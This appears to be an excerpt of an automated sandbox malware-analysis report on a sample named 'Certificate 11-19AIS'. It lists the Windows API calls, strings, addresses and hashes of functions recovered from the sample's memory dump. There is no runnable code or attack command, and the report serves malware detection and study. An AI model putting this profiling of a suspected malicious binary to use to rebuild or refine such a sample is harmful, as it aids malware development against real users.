                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 618562835-2268648507
                                                                              • Opcode ID: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                                              • Instruction ID: 0fd80d1bcc54c3e2697d30d950cc13fba69d87715a9c42f434a8dd494e068335
                                                                              • Opcode Fuzzy Hash: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                                              • Instruction Fuzzy Hash: 4D412C7280021DFACB15FBD0DD8AFEEB778AF54340F500065B601B2192EA786F49CB61
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007FD0D8
                                                                              • __swprintf.LIBCMT ref: 007FD0FA
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 007FD137
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007FD15C
                                                                              • _memset.LIBCMT ref: 007FD17B
                                                                              • _wcsncpy.LIBCMT ref: 007FD1B7
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007FD1EC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007FD1F7
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 007FD200
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007FD20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                                              • Instruction ID: aaaf9cb0da02f419c2644c292adf2e5739c0de99eb945ba42edd64236c28c843
                                                                              • Opcode Fuzzy Hash: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                                              • Instruction Fuzzy Hash: C531AFB2900209ABDB21DFA0DC49FEB77BDFF89700F1044B6F609D2260E7749A458B64
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0081BEF4,?,?), ref: 0081E754
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E76B
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E776
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E783
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0081E78C
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E79B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0081E7A4
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7AB
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7BC
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0083D9BC,?), ref: 0081E7D5
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0081E7E5
                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0081E809
                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0081E834
                                                                              • DeleteObject.GDI32(00000000), ref: 0081E85C
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0081E872
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                                              • Instruction ID: e34832167a8318199980466c1e7d00c475e94fb08dac0c1e3837d22d829bb25a
                                                                              • Opcode Fuzzy Hash: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                                              • Instruction Fuzzy Hash: 81411875600208AFDB119F65EC88EAABBB8FF89715F104868F916D72A0D770A941DB60
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 0080076F
                                                                              • _wcscat.LIBCMT ref: 00800787
                                                                              • _wcscat.LIBCMT ref: 00800799
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008007AE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008007C2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 008007DA
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008007F4
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800806
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                                              • Instruction ID: e04c757cf55f76c68f9d1e02cc7cb195c44bf56e71af5801f2a71554e786496f
                                                                              • Opcode Fuzzy Hash: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                                              • Instruction Fuzzy Hash: CC81AE715043459FCBA0DF24CC44AAEB3E9FBD8304F18882EF899C7291EA35D9448F92
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0081EF3B
                                                                              • GetFocus.USER32 ref: 0081EF4B
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0081EF56
                                                                              • _memset.LIBCMT ref: 0081F081
                                                                              • GetMenuItemInfoW.USER32 ref: 0081F0AC
                                                                              • GetMenuItemCount.USER32(00000000), ref: 0081F0CC
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0081F0DF
                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0081F113
                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0081F15B
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0081F193
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0081F1C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: edc4a600e003f0b6fc51333ba65ca390b4cae5a6dc597a001b536dd3e6fa91c4
                                                                              • Instruction ID: ddc84a8e6d822afda927d4f996b6cb7a2cba68ebb9ac3eeb4b76d150932cf5f6
                                                                              • Opcode Fuzzy Hash: edc4a600e003f0b6fc51333ba65ca390b4cae5a6dc597a001b536dd3e6fa91c4
                                                                              • Instruction Fuzzy Hash: 26816B71104301EFDB11CF14D888AAABBE9FF88714F10492EFA99D7292D770D985CB92
                                                                              APIs
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                                • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                                • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                                • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                                • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                                                • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                                                • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA8CB
                                                                              • _memset.LIBCMT ref: 007EA8E0
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA8FF
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA910
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007EA94D
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA969
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA986
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA995
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EA99C
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA9BD
                                                                              • CopySid.ADVAPI32(00000000), ref: 007EA9C4
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA9F5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EAA1B
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EAA2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                                              • Instruction ID: dc3485dc9a6ab4ecd7914e772b0fcf68b2d205fa5ea4a6105dd99a8e0996e348
                                                                              • Opcode Fuzzy Hash: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                                              • Instruction Fuzzy Hash: EB515DB1901249BFDF04DFA1DD85AEEBB79FF48300F048529F811AB290DB38A905CB61
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00809E36
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00809E42
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00809E4E
                                                                              • SelectObject.GDI32(00000000,?), ref: 00809E5B
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00809EAF
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00809EEB
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00809F0F
                                                                              • SelectObject.GDI32(00000006,?), ref: 00809F17
                                                                              • DeleteObject.GDI32(?), ref: 00809F20
                                                                              • DeleteDC.GDI32(00000006), ref: 00809F27
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00809F32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 63bbbf021643e77dc33b8f3410b482b147b9d40d2ceedb7b7dd7daae4173a1fd
                                                                              • Instruction ID: 044db2d98f904595bff09ad3f0219b08e37cd170309b318f1333d91931dd1e73
                                                                              • Opcode Fuzzy Hash: 63bbbf021643e77dc33b8f3410b482b147b9d40d2ceedb7b7dd7daae4173a1fd
                                                                              • Instruction Fuzzy Hash: AE513776900309EFCB14CFA8DC85EAEBBB9FF48710F14881DF999A7250D771A9418B90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-2391861430
                                                                              • Opcode ID: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                                              • Instruction ID: 9684ea3570ddb10ce76308082932160563faa56312b85cd604bc8b24c28bfe34
                                                                              • Opcode Fuzzy Hash: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                                              • Instruction Fuzzy Hash: 42516A7190020DFACB16EBA4CE4AFEEB778EF04304F104065F515722A2EB396E59DB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-3420473620
                                                                              • Opcode ID: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                                              • Instruction ID: 95d3309e8cba7f1f60d9cb7628a989f57de8ec3de01691ba1123582e7ea11bd9
                                                                              • Opcode Fuzzy Hash: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                                              • Instruction Fuzzy Hash: 75516D7190060DEADF15EBA4DE4AFEEB778AF04340F104065F605722A2EA386F59DF61
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F55D7
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007F5664
                                                                              • GetMenuItemCount.USER32(00871708), ref: 007F56ED
                                                                              • DeleteMenu.USER32(00871708,00000005,00000000,000000F5,?,?), ref: 007F577D
                                                                              • DeleteMenu.USER32(00871708,00000004,00000000), ref: 007F5785
                                                                              • DeleteMenu.USER32(00871708,00000006,00000000), ref: 007F578D
                                                                              • DeleteMenu.USER32(00871708,00000003,00000000), ref: 007F5795
                                                                              • GetMenuItemCount.USER32(00871708), ref: 007F579D
                                                                              • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F57D3
                                                                              • GetCursorPos.USER32(?), ref: 007F57DD
                                                                              • SetForegroundWindow.USER32(00000000), ref: 007F57E6
                                                                              • TrackPopupMenuEx.USER32(00871708,00000000,?,00000000,00000000,00000000), ref: 007F57F9
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007F5805
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                                              • Instruction ID: 2bb70f5aa57112003dd5a1f325e2c5c30424cabd75b1a9cdcf7fa1408d9af0ce
                                                                              • Opcode Fuzzy Hash: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                                              • Instruction Fuzzy Hash: 2971C270641A0DBBEB219B54DC89FBABF65FF40768F244205F728AA3D1C7795810DBA0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007EA1DC
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007EA211
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007EA22D
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007EA249
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007EA273
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007EA29B
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2A6
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2AB
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1687751970-22481851
                                                                              • Opcode ID: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                                              • Instruction ID: 6981b54b9ae0ebf247ce1268019f3d532ea6ae7cbb0727b70c151fc1916a8d4c
                                                                              • Opcode Fuzzy Hash: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                                              • Instruction Fuzzy Hash: 0D41F776C1162DEACB25EBA4DC99AEDB778FF48710F004469E901B3161EB78AE05CB50
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                                              • Instruction ID: faa3794fa198169b6b60ba2b8afc4d7e54e05d0872091e58c8d62d5e64197668
                                                                              • Opcode Fuzzy Hash: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                                              • Instruction Fuzzy Hash: 1041427010024ACBDF10EF54E856AEF3369FF52340F515458EC569B292EB74AE9ACB60
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008236F4,00000010,?,Bad directive syntax error,0084DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007F25D6
                                                                              • LoadStringW.USER32(00000000,?,008236F4,00000010), ref: 007F25DD
                                                                              • _wprintf.LIBCMT ref: 007F2610
                                                                              • __swprintf.LIBCMT ref: 007F2632
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007F26A1
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1080873982-4153970271
                                                                              • Opcode ID: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                                              • Instruction ID: 404176ea32f3a51a06fce12ea72f6808b9a685c44a9999c0666c6015e47bb6d0
                                                                              • Opcode Fuzzy Hash: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                                              • Instruction Fuzzy Hash: 63214B3190021EFFCF12AB90CC4AFEE7B39FF18304F044455F515A62A2EA79A629DB51
                                                                              APIs
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007F7B42
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007F7B58
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F7B69
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007F7B7B
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007F7B8C
                                                                              Similarity
                                                                              • API ID: SendString
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 890592661-1007645807
                                                                              • Opcode ID: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                                              • Instruction ID: 59d68c1ab6a7cb58efbdd4bbb3b98eae1ce58273340624bb8a5c4ee6576016d4
                                                                              • Opcode Fuzzy Hash: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                                              • Instruction Fuzzy Hash: 7B1182E165025DB9D724B765CC4EEFF7A7CFBD2B10F000429B521A21D1EEA81A45C5A0
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 007F7794
                                                                                • Part of subcall function 007CDC38: timeGetTime.WINMM(?,7608B400,008258AB), ref: 007CDC3C
                                                                              • Sleep.KERNEL32(0000000A), ref: 007F77C0
                                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007F77E4
                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007F7806
                                                                              • SetActiveWindow.USER32 ref: 007F7825
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007F7833
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 007F7852
                                                                              • Sleep.KERNEL32(000000FA), ref: 007F785D
                                                                              • IsWindow.USER32 ref: 007F7869
                                                                              • EndDialog.USER32(00000000), ref: 007F787A
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                                              • Instruction ID: 26c988da383c598b94b3f7609cef0e4ac8333fee58b5ed0048a18abcc4c947a7
                                                                              • Opcode Fuzzy Hash: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                                              • Instruction Fuzzy Hash: 472142B0214309AFE7156B60FC8DB363F6AFB44345F004414F619863B6DB79DD50EA62
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
